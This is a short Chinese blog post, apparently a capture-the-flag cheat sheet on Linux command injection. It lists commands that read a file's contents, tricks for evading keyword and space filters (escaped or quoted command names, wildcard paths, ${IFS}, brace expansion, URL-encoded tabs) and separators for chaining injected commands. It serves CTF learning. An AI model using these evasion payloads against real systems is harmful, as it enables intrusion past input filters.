CTF之Linux命令执行

一、查看文件内容

1.cat
2.nl
3.tac
4.rev 倒序输出
5.more:一页一页的显示档案内容
6.less:与 more 类似 head:查看头几行
7.tail:查看尾几行
8.od:以二进制的方式读取档案内容
9.vi:一种编辑器,这个也可以查看
10.vim:一种编辑器,这个也可以查看
11.sort:可以查看
12.uniq:可以查看 
13.file -f:报错出具体内容 grep//我没成功, 不过本地可以出。
14.strings

二、绕过关键字或空格过滤

1.绕过关键字过滤

ca\t

ca''t

ca``t

c=/bin/?at${IFS}f???????

c=/???/????64 ????????

l${Z}s

2.绕过空格过滤

cat${IFS}fla*.ph?   

cat$IFS$1* //1 改 成 1改成1改成加其他数字貌似都行  

cat<flag.php

cat<>flag.php

{cat,flag.php} //用逗号实现了空格功能

%20----->空格

%09----->tab

三、命令截断

1.;
2. %0a 也就是换行
3.||
4.& === %26

 

posted @ 2022-08-10 13:26  hithub  阅读(315)  评论(0)    收藏  举报